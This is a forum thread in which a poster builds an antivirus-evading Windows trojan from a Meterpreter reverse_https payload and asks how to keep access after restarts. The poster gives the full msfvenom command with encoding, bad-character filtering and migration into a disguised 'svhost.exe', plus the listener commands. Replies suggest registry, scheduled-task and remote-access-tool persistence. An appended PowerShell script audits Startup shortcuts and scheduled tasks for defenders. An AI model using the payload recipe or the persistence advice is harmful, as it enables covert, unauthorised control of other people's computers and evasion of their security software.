Meterpreter reverse_https session lost upon restart (shortcut method)


Oxidizer


So I've created an .exe using reverse_https meterpreter shell code and it's undetectable. However, all of meterpreter's persistence methods resulted in the AV going off, so I decided to use NSIS to make an installer for my trojan. This does get detected by a few AVs, but it's as close to undetectable as I could get and still have persistence. It copies the .exe somewhere else and creates a shortcut in the user's startup folder so that the .exe is run upon sign-in. However, meterpreter does not start a new session when the session is lost, and upon sign-in, nothing happens. The old session is still open, but unresponsive. I know that the .exe is run upon log-in because when I manually close the session and then listen, it will pick up a new session.

How do I maintain access by using the shortcut method? Also, is there a better way to maintain persistence without NSIS? Using NSIS seems silly. I want the .exe to immediately have persistence without connecting back and then have metasploit tell it to do something.

Here is the shell code that I'm using:

msfvenom -p windows/meterpreter/reverse_https lhost=xxxx lport=xxxx PrependMigrate=true PrependMigrateProc=svhost.exe -b '\x00\xff' -e x86/shikata_ga_nai -i 3 -f c

This is what I type when I start metasploit on Kali:

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set SessionCommunicationTimeout 0
exploit

I'm not so sure NSIS is necessary... you can use the meterpreter to upload files or write files to the destination folder... place a meterpreter in the startup folder...

You can use rc scripts with the exploit handler to automate meterpreter commands. When a shell is first established this rc script would execute...

From the meterpreter shell, have you tried to modify the registry? Attempt to make a startup service... will this set off the AV?

You have to keep trying new things, and take note of what works...


Scheduled tasks, environment variables, aliases.

You can always write a scheduled task to check if your payload is running; if not, start it. It can also stop it, delete it, and download and install a new version of the payload.

Maybe install a legitimate remote access tool on the machine. VNC or whatever.

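The two persistence mechanisms this thread keeps coming back to, a shortcut dropped in the Startup folder and a scheduled task that keeps a payload alive, are exactly what a defender audits for on a Windows host. The PowerShell below is an added example, not something posted in the thread: it resolves every .lnk in the per-user and all-users Startup folders to its real target and arguments, walks the actions of every non-disabled scheduled task, and reports any launcher whose executable lives outside Program Files or the Windows directory. The list of trusted roots is an assumption to tune per environment.

```powershell
# Added example (not from the thread): audit Startup-folder shortcuts and
# scheduled-task actions for executables launched from unusual locations.

$startupFolders = @(
    [Environment]::GetFolderPath('Startup'),        # current user's Startup folder
    [Environment]::GetFolderPath('CommonStartup')   # all-users Startup folder
)

# Directories from which startup items are normally launched.
# Assumption: adjust this list for the environment being audited.
$trustedRoots = @(
    $env:ProgramFiles,
    ${env:ProgramFiles(x86)},
    $env:SystemRoot
) | Where-Object { $_ }

function Test-TrustedPath {
    param([string]$Path)
    if ([string]::IsNullOrWhiteSpace($Path)) { return $false }
    # Task actions often carry %windir%-style variables and surrounding quotes
    $expanded = [Environment]::ExpandEnvironmentVariables($Path).Trim('"')
    foreach ($root in $trustedRoots) {
        if ($expanded.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { return $true }
    }
    return $false
}

$shell = New-Object -ComObject WScript.Shell

# 1. Startup-folder shortcuts: resolve each .lnk to its target and arguments
$findings = @(foreach ($folder in $startupFolders) {
    if (-not (Test-Path $folder)) { continue }
    Get-ChildItem -Path $folder -Filter *.lnk -File | ForEach-Object {
        $lnk = $shell.CreateShortcut($_.FullName)
        [pscustomobject]@{
            Source    = 'StartupFolder'
            Name      = $_.Name
            Target    = $lnk.TargetPath
            Arguments = $lnk.Arguments
            Trusted   = Test-TrustedPath $lnk.TargetPath
            Created   = $_.CreationTime
        }
    }
})

# 2. Scheduled tasks: inspect the executable behind each exec action
#    (COM-handler actions have no Execute property and are skipped)
$findings += @(Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' } | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        if ($action.Execute) {
            [pscustomobject]@{
                Source    = 'ScheduledTask'
                Name      = "$($task.TaskPath)$($task.TaskName)"
                Target    = $action.Execute
                Arguments = $action.Arguments
                Trusted   = Test-TrustedPath $action.Execute
                Created   = $task.Date
            }
        }
    }
})

# Report everything that launches from outside the trusted roots
$findings | Where-Object { -not $_.Trusted } |
    Sort-Object Source, Name |
    Format-Table Source, Name, Target, Arguments, Created -AutoSize
```

Run it from an elevated PowerShell on Windows 8 / Server 2012 or later, where Get-ScheduledTask (ScheduledTasks module) is available. A hit whose Target sits under a user-writable directory such as AppData or Temp is the pattern described in the first post: a copied executable launched at every sign-in. The Created column helps tie a finding to a time window when checking it against sign-in and process-creation logs.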
